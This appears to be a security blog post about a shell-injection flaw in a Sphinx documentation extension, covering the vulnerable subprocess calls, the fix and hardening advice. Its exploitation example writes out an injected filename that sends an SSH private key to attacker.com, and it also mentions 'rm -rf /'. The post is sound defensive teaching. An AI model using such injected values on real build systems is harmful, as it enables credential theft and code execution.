Shell Injection in Sphinx Extensions: How a Docs Tool Became a Security Risk

Severity: Critical | CVE Class: Command Injection (CWE-78) | Fixed In: PR - "fix: sanitize subprocess call in gmtplot.py"

Introduction

When developers think about attack surfaces, they typically focus on web endpoints, authentication systems, or data storage. Rarely does anyone look twice at the documentation pipeline. Yet documentation tooling — especially custom Sphinx extensions that process contributor-supplied content — can harbor some of the most dangerous vulnerabilities in a codebase.

This post covers a critical shell injection vulnerability discovered and fixed in gmtplot.py, a custom Sphinx extension used to render GMT (Generic Mapping Tools) plots in documentation. The vulnerability allowed an attacker with the ability to contribute RST documentation files to execute arbitrary shell commands on any machine that built the documentation.

If your CI/CD pipeline builds docs automatically — and most modern projects do — this means remote code execution on your build infrastructure.

The Vulnerability Explained

What Is Shell Injection?

Shell injection (also known as OS command injection) occurs when an application passes unsanitized, user-controlled data to a system shell interpreter. When Python's subprocess.run() is called with shell=True, the entire command string is handed to /bin/sh for interpretation. This means the shell will parse and execute any valid shell syntax embedded in the string — including metacharacters like:

Metacharacter	Effect
`;`	Execute next command sequentially
`\\|`	Pipe output to another command
`&&`	Execute next command if first succeeds
` `	Command substitution (backticks)
`$()`	Command substitution (modern syntax)
`>` / `>>`	Redirect output to a file

The Vulnerable Code

In docs/source/_extensions/gmtplot.py, at lines 173, 174, and 197, the extension invoked subprocess.run() like this:

# VULNERABLE CODE (before fix)
import subprocess

# ps_images[0] is derived from user-supplied RST documentation content
ps_file = ps_images[0]

# shell=True + unsanitized input = shell injection
subprocess.run(f"gmt psconvert {ps_file} -A -Tg", shell=True)
subprocess.run(f"gmt psconvert {ps_file} -A -Tf", shell=True)

# Also vulnerable at line 197
subprocess.run(f"convert {ps_file} output.png", shell=True)

The variable ps_images[0] is a file path derived from the processing of RST source files — content that documentation contributors control.

How Could It Be Exploited?

An attacker who can submit a pull request (or directly push to a branch) containing RST documentation files can craft a filename or directive that injects shell commands. Here's a concrete example:

Step 1: The attacker contributes an RST file containing a GMT plot directive with a malicious path:

.. gmtplot::
    :caption: Innocent-looking map

    # Script that generates a file with a dangerous name

Step 2: The extension processes this and constructs a path like:

legitimate_plot.ps; curl https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) #

Step 3: When subprocess.run() executes with shell=True, the shell sees:

gmt psconvert legitimate_plot.ps; curl https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) # -A -Tg

The shell dutifully executes both the legitimate GMT command and the attacker's injected command.

Real-World Impact

The consequences depend on the context in which documentation is built, but consider:

CI/CD Compromise: Most projects auto-build docs in pipelines. A malicious PR could exfiltrate secrets, install backdoors, or pivot to internal infrastructure.
Developer Machine Compromise: Any developer who checks out the branch and runs make html locally becomes a victim.
Supply Chain Attack: If documentation is built as part of a release process, an attacker could tamper with build artifacts or inject malicious code into published packages.
Secret Exfiltration: Build environments commonly contain API keys, cloud credentials, SSH keys, and deployment tokens — all accessible to injected commands.

This is not theoretical. Similar vulnerabilities have been exploited in CI/CD systems to steal secrets and compromise software supply chains.

The Fix

What Changed?

The fix eliminates the root cause by removing shell=True and passing command arguments as a list instead of a string. When subprocess.run() receives a list, Python uses execvp() to run the process directly — no shell is involved, and therefore no shell metacharacter interpretation occurs.

# FIXED CODE (after fix)
import subprocess
import shlex

# ps_images[0] is still user-derived, but now safely handled
ps_file = ps_images[0]

# Pass as a list — no shell involved, metacharacters are treated as literals
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tg"], check=True)
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tf"], check=True)

# Also fixed at line 197
subprocess.run(["convert", ps_file, "output.png"], check=True)

Why This Works

When you pass a list to subprocess.run():

Python calls os.execvp() (or equivalent) directly
The operating system treats each list element as a discrete argument
No shell is spawned, so no shell parsing occurs
A filename like file.ps; rm -rf / is passed literally as the filename argument to gmt psconvert — the semicolon is just a character, not a command separator

The attack is completely neutralized because the shell — the interpreter that gives metacharacters their power — is never invoked.

Additional Hardening (Defense in Depth)

Beyond the primary fix, consider these additional hardening measures:

import subprocess
import os
from pathlib import Path

def safe_convert(ps_file: str, output_dir: str) -> None:
    """Safely convert PS file with input validation."""

    # 1. Validate the file exists and is within expected directory
    ps_path = Path(ps_file).resolve()
    allowed_base = Path(output_dir).resolve()

    if not ps_path.is_relative_to(allowed_base):
        raise ValueError(f"Path traversal detected: {ps_file}")

    # 2. Validate file extension
    if ps_path.suffix.lower() not in ('.ps', '.eps'):
        raise ValueError(f"Unexpected file type: {ps_path.suffix}")

    # 3. Use list form (no shell=True) — primary defense
    result = subprocess.run(
        ["gmt", "psconvert", str(ps_path), "-A", "-Tg"],
        capture_output=True,
        text=True,
        timeout=60,  # 4. Add timeout to prevent resource exhaustion
        check=True   # 5. Raise on non-zero exit code
    )

Prevention & Best Practices

The Golden Rule: Never Use `shell=True` with External Input

This is the single most important takeaway. Python's subprocess documentation itself warns:

"Using shell=True can be a security hazard... Do not use shell=True when the command string is constructed from external input."

Follow this decision tree:

Do you need shell features (pipes, redirects, globs)?
├── YES → Can you redesign to avoid them?
│         ├── YES → Redesign (preferred)
│         └── NO  → Use shell=True ONLY with fully hardcoded strings
│                   Never interpolate external data
└── NO  → Always use shell=False (list form)

Input Validation and Allowlisting

When you must work with user-supplied paths or filenames, validate them strictly:

import re
from pathlib import Path

def validate_plot_filename(filename: str) -> bool:
    """Allowlist-based filename validation."""
    # Only allow alphanumeric, hyphens, underscores, dots
    if not re.match(r'^[a-zA-Z0-9_\-]+\.(ps|eps)$', filename):
        return False
    # Prevent path traversal
    if '..' in filename or '/' in filename:
        return False
    return True

Use `shlex.quote()` as a Last Resort

If you absolutely cannot avoid shell=True, use shlex.quote() to escape arguments:

import shlex
import subprocess

# Last resort only — prefer list form instead
safe_path = shlex.quote(ps_file)
subprocess.run(f"gmt psconvert {safe_path} -A -Tg", shell=True)

⚠️ Warning: This is a mitigation, not a cure. The list-form approach is always preferred.

Relevant Security Standards

Standard	Reference	Description
OWASP	A03:2021 – Injection	Injection ranks #3 in OWASP Top 10
CWE	CWE-78	OS Command Injection
CWE	CWE-88	Argument Injection
SANS	CWE/SANS Top 25	Most Dangerous Software Errors

Detection Tools

Add these to your security pipeline to catch similar issues:

Bandit — Python-specific SAST tool; detects shell=True usage (rule B602, B603)
bash pip install bandit bandit -r . -t B602,B603
Semgrep — Pattern-based code scanning with rules for subprocess misuse
bash semgrep --config "p/python" .
CodeQL — GitHub's semantic code analysis; has built-in queries for command injection
Safety — Scans Python dependencies for known vulnerabilities
Pre-commit hooks — Run Bandit automatically before every commit

Secure Code Review Checklist

When reviewing code that invokes subprocesses, ask:

[ ] Is shell=True used? If so, is it absolutely necessary?
[ ] Does any part of the command string come from external input (files, environment, user input, network)?
[ ] Are file paths validated against an allowlist of expected directories?
[ ] Is there a timeout to prevent resource exhaustion?
[ ] Are errors handled to prevent information leakage via exception messages?
[ ] Is the principle of least privilege applied (does the process need all these permissions)?

A Note on Documentation Pipelines

This vulnerability highlights a frequently overlooked truth: your documentation pipeline is part of your attack surface.

Modern documentation workflows often include:

Automatic builds triggered by pull requests from external contributors
Sphinx extensions that execute code to generate examples and plots
Jupyter notebooks rendered as documentation
Auto-generated API docs that execute import statements

Each of these is a potential code execution vector. Treat your documentation build environment with the same security rigor as your production build:

Sandbox doc builds in isolated environments with no access to production secrets
Require review before building PRs from first-time contributors
Use separate secret stores — doc build environments should not have the same credentials as release pipelines
Audit custom Sphinx extensions — they often run with full filesystem and network access

Conclusion

A single shell=True in a documentation extension turned a benign plot-rendering tool into a potential remote code execution vulnerability. The fix was straightforward — replace string interpolation with a properly structured argument list — but the implications were significant.

Key takeaways:

shell=True + user input = shell injection. This is one of the most reliable rules in security.
Documentation tooling is an attack surface. CI/CD pipelines that auto-build docs are especially at risk.
The fix is simple: use subprocess.run(["cmd", "arg1", "arg2"]) instead of subprocess.run(f"cmd {arg}", shell=True).
Layer your defenses: input validation, path restrictions, and static analysis tools complement the primary fix.
Automate detection: Bandit and Semgrep can catch these issues before they reach production.

Security vulnerabilities don't only live in authentication systems and API endpoints. They hide in build scripts, test helpers, and documentation generators — the parts of a codebase that developers trust implicitly. The best defense is consistent, skeptical review of any code that touches external input, regardless of how "internal" it seems.

Secure every layer. Trust no input.

This vulnerability was identified and fixed as part of an automated security scanning process. If you maintain Sphinx extensions or other documentation tooling that invokes subprocesses, audit your code for similar patterns today.

References: CWE-78 | OWASP Injection | Python subprocess docs | Bandit B602

Shell Injection in Sphinx Extensions: How a Docs Tool Became a Security Risk

Shell Injection in Sphinx Extensions: How a Docs Tool Became a Security Risk

Introduction

The Vulnerability Explained

What Is Shell Injection?

The Vulnerable Code

How Could It Be Exploited?

Real-World Impact

The Fix

What Changed?

Why This Works

Additional Hardening (Defense in Depth)

Prevention & Best Practices

The Golden Rule: Never Use `shell=True` with External Input

Input Validation and Allowlisting

Use `shlex.quote()` as a Last Resort

Relevant Security Standards

Detection Tools

Secure Code Review Checklist

A Note on Documentation Pipelines

Conclusion

View the Security Fix

Related Articles

Stack Buffer Overflow in MapScale: How Five Unsafe sprintf Calls Created a Critical Vulnerability

Heap Buffer Overflows in YAML Parser: How Unchecked memcpy Calls Create Critical Attack Vectors

Critical Buffer Overflow Fixed: When "Safe" Functions Aren't Safe

Shell Injection in Sphinx Extensions: How a Docs Tool Became a Security Risk

Shell Injection in Sphinx Extensions: How a Docs Tool Became a Security Risk

Introduction

The Vulnerability Explained

What Is Shell Injection?

The Vulnerable Code

How Could It Be Exploited?

Real-World Impact

The Fix

What Changed?

Why This Works

Additional Hardening (Defense in Depth)

Prevention & Best Practices

The Golden Rule: Never Use shell=True with External Input

Input Validation and Allowlisting

Use shlex.quote() as a Last Resort

Relevant Security Standards

Detection Tools

Secure Code Review Checklist

A Note on Documentation Pipelines

Conclusion

View the Security Fix

Related Articles

Stack Buffer Overflow in MapScale: How Five Unsafe sprintf Calls Created a Critical Vulnerability

Heap Buffer Overflows in YAML Parser: How Unchecked memcpy Calls Create Critical Attack Vectors

Critical Buffer Overflow Fixed: When "Safe" Functions Aren't Safe

The Golden Rule: Never Use `shell=True` with External Input

Use `shlex.quote()` as a Last Resort